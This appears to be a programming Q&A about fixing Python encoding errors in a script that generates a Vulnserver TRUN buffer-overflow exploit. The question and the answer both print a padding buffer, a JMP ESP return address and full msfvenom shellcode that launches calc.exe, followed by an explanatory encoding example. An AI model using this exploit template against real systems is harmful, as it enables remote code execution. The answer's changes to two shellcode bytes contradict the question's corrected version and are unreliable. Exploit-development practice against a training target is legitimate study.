
Python script generating file with exploit code - unicodeescape unicode error

I'm writing a script that should generate a file to exploit Vulnserver.

Everything seemed to be fine, but then I added the shellcode and now I get a unicode error (unicodeescape).

#!C:\Users\user\AppData\Local\Programs\Python\Python36\python.exe

import sys, struct

file_suffix='shellcode.txt'
buf='.'

buf+='A'*2006 # buffer

#buf+=''*4 #EIP
#buf+=struct.pack('<I', 0x625011AF) # JMP ESP at 625011AF in essfunc.dll
buf+='\xaf\x11\x50\x62'

#buf+='C'*2000 # space for shellcode
# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00'
buf += "\xd9\xcb\xbd\x1a\xe4\x34\x1e\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x31\x31\x6a\x18\x03\x6a\x18\x83\xc2\x1e\x06"
buf += "\xc1\xe2\xf6\x44\x2a\x1b\x06\x29\xa2\xfe\x37\x69\xd0"
buf += "\x8b\x67\x59\x92\xde\x8b\x12\xf6\xca\x18\x56\xdf\xfd"
buf += "\xa9\xdd\x39\x33\x2a\x4d\x79\x52\xa8\x8c\xae\xb4\x91"
buf += "\x5e\xa3\xb5\xd6\x83\x4e\xe7\x8f\xc8\xfd\x18\xa4\x85"
buf += "\x3d\x92\xf6\x08\x46\x47\x4e\x2a\x67\xd6\xc5\x75\xa7"
buf += "\xd8\x0a\x0e\xee\xc2\x4f\x2b\xb8\x79\xbb\xc7\x3b\xa8"
buf += "\xf2\x28\x97\x95\x3b\xdb\xe9\xd2\xfb\x04\x9c\x2a\xf8"
buf += "\xb9\xa7\xe8\x83\x65\x2d\xeb\x23\xed\x95\xd7\xd2\x22"
buf += "\x43\x93\xd8\x8f\x07\xfb\xfc\x0e\xcb\x77\xf8\x9b\xea"
buf += "\x57\x89\xd8\xc8\x73\xd2\xbb\x71\x25\xbe\x6a\x8d\x35"
buf += "\x61\xd2\x2b\x3d\x8f\x07\x46\x1c\xc5\xd6\xd4\x1a\xab"
buf += "\xd9\xe6\x24\x9b\xb1\xd7\xaf\x74\xc5\xe7\x65\x31\x39"
buf += "\xa2\x24\x13\xd2\x6b\xbd\x26\xbf\x8b\x6b\x64\xc6\x0f"
buf += "\x9e\x14\x3d\x0f\xeb\x11\x79\x97\x07\x6b\x12\x72\x28"
buf += "\xd8\x13\x57\x4b\xbf\x87\x3b\xa2\x5a\x20\xd9\xba"

stat_opt='TRUN'

content=stat_opt+' '+buf
f = open(stat_opt+file_suffix,"w")
f.write(content)
f.close()

Then the generated file is sent to vulnserver with ncat.

How can I successfully write a file that contains the string defined in the script above (starting with TRUN .AAAA[...]), followed by the value \xaf\x11\x50\x62, followed by the shellcode?

Edit: completely forgot the traceback:

  File "gen.py", line 16
    buf+="\xd9\xcb\xbd\x1a\xe4\x34\x1e\xd9\x74\x24\xf4\x5a\x2"
        ^
SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 48-50: truncated \xXX escape

Edit 2: I want to write the byte code, represented by the hex values, into the file.

Edit 3: I re-copied the shellcode from msfvenom, and the single-character hex values are now correct (script updated). But I have a new traceback:

Traceback (most recent call last):
  File "gen.py", line 38, in <module>
    f.write(content)
  File "C:\Users\user\AppData\Local\Programs\Python\Python36\lib\encodings\cp1252.py", line 19, in encode
    return codecs.charmap_encode(input,self.errors,encoding_table)[0]
UnicodeEncodeError: 'charmap' codec can't encode character '\x83' in position 2038: character maps to <undefined>

Every hex code needs two digits, but the end of the first line has \x2, and this causes the problem. I don't know, maybe it should be \x02.

You also have \xa at the end of other lines - maybe you need \x0a.

Python treats it as UNICODE text and tries to convert it to bytes using CP1252 (Code Page 1252).

Better to use bytes - add the prefix b to all strings. And save it to the file with wb.

buf = b'.'
buf += b'A'*2006 # buffer

buf += b'\xaf\x11\x50\x62' # EIP; JMP ESP at 625011AF in essfunc.dll

#buf+='C'*2000 # space for shellcode
# Generated with: msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00'
buf += b"\xd9\xcb\xbd\x1a\xe4\x34\x1e\xd9\x74\x24\xf4\x5a\x02"
buf += b"\xc9\xb1\x31\x31\x6a\x18\x03\x6a\x18\x83\xc2\x1e\x06"
buf += b"\xc1\xe2\xf6\x44\x2a\x1b\x06\x29\xa2\xfe\x37\x69\xd0"
buf += b"\x8b\x67\x59\x92\xde\x8b\x12\xf6\xca\x18\x56\xdf\xfd"
buf += b"\xa9\xdd\x39\x33\x2a\x4d\x79\x52\xa8\x8c\xae\xb4\x91"
buf += b"\x5e\xa3\xb5\xd6\x83\x4e\xe7\x8f\xc8\xfd\x18\xa4\x85"
buf += b"\x3d\x92\xf6\x08\x46\x47\x4e\x2a\x67\xd6\xc5\x75\xa7"
buf += b"\xd8\x0a\x0e\xee\xc2\x4f\x2b\xb8\x79\xbb\xc7\x3b\xa8"
buf += b"\xf2\x28\x97\x95\x3b\xdb\xe9\xd2\xfb\x04\x9c\x2a\xf8"
buf += b"\xb9\xa7\xe8\x83\x65\x2d\xeb\x23\xed\x95\xd7\xd2\x22"
buf += b"\x43\x93\xd8\x8f\x07\xfb\xfc\x0e\xcb\x77\xf8\x9b\xea"
buf += b"\x57\x89\xd8\xc8\x73\xd2\xbb\x71\x25\xbe\x6a\x8d\x35"
buf += b"\x61\xd2\x2b\x3d\x8f\x07\x46\x1c\xc5\xd6\xd4\x1a\x0a"
buf += b"\xd9\xe6\x24\x9b\xb1\xd7\xaf\x74\xc5\xe7\x65\x31\x39"
buf += b"\xa2\x24\x13\xd2\x6b\xbd\x26\xbf\x8b\x6b\x64\xc6\x0f"
buf += b"\x9e\x14\x3d\x0f\xeb\x11\x79\x97\x07\x6b\x12\x72\x28"
buf += b"\xd8\x13\x57\x4b\xbf\x87\x3b\xa2\x5a\x20\xd9\xba"

content = b'TRUN '+buf

f = open('TRUNshellcode_test.txt', "wb")
f.write(content)

f.close()
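The following is an added example, not code from the question or the answer above. It shows the three mechanisms behind the two tracebacks: a str literal with `\x83` cannot be encoded by the cp1252 codec that Windows text-mode files use by default, a text-mode file rewrites a `\x0a` character as a line ending (on Windows this happens by default; the `newline="\r\n"` argument reproduces that behaviour on any platform), and only `bytes` written with `"wb"` reach the disk unchanged. It also includes a small `from_hex_checked` helper that rejects an odd number of hex digits, which is how a truncated escape such as `\x2` at a line end shows up when a payload is kept as a hex dump instead of an escaped string literal. `SAMPLE_TEXT` and all function names are constructed for this example.

```python
"""Why the str-based script fails and the bytes-based one works (added example)."""
import os
import tempfile

# Constructed sample: a few characters a shellcode string typically contains.
# U+0083 has no mapping in Windows code page 1252, and U+000A is a newline
# from the text layer's point of view.
SAMPLE_TEXT = "TRUN .\xaf\x11\x50\x62\x83\x0a"


def encode_with(text, codec):
    """Encode *text* with *codec*; return (bytes, None) or (None, (start, reason))."""
    try:
        return text.encode(codec), None
    except UnicodeEncodeError as exc:
        # exc.start is the index of the first character the codec rejected
        return None, (exc.start, exc.reason)


def write_text_mode(text, encoding, newline=None):
    """Write *text* through a text-mode file and return the raw bytes on disk.

    newline="\\r\\n" mimics what Windows does by default when '\\n' is written
    in text mode; newline=None on Linux/macOS leaves '\\n' alone.
    """
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        with open(path, "w", encoding=encoding, newline=newline) as f:
            f.write(text)
        with open(path, "rb") as f:
            return f.read()
    finally:
        os.remove(path)


def write_binary_mode(data):
    """Write *data* (bytes) with 'wb' and return what is read back."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        with open(path, "wb") as f:
            f.write(data)
        with open(path, "rb") as f:
            return f.read()
    finally:
        os.remove(path)


def from_hex_checked(hex_string):
    """Build bytes from a whitespace-separated hex dump.

    An odd number of digits means one byte lost a digit (the "\\x2" problem
    from the question); raise instead of silently producing a shorter payload.
    """
    digits = "".join(hex_string.split())
    if len(digits) % 2:
        raise ValueError("odd number of hex digits: a byte is truncated")
    return bytes.fromhex(digits)


def demo():
    results = {}
    # 1. cp1252 (the default text encoding on the poster's Windows box) rejects U+0083.
    results["cp1252"] = encode_with(SAMPLE_TEXT, "cp1252")
    # 2. latin-1 maps U+0000..U+00FF one-to-one, so the encode step succeeds ...
    results["latin1"] = encode_with(SAMPLE_TEXT, "latin-1")
    # 3. ... but text mode still turns the 0x0a byte into a platform line ending.
    results["text_mode_crlf"] = write_text_mode(SAMPLE_TEXT, "latin-1", newline="\r\n")
    # 4. bytes + 'wb' is the only path that preserves every byte verbatim.
    results["binary"] = write_binary_mode(SAMPLE_TEXT.encode("latin-1"))
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
    print(from_hex_checked("af 11 50 62"))
```

The `latin1` case is worth noting: encoding with latin-1 avoids the `charmap` error, but a text-mode file still owns the line-ending translation, so the only reliable way to get exactly the bytes you built is the answer's combination of `b''` literals and `"wb"`.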
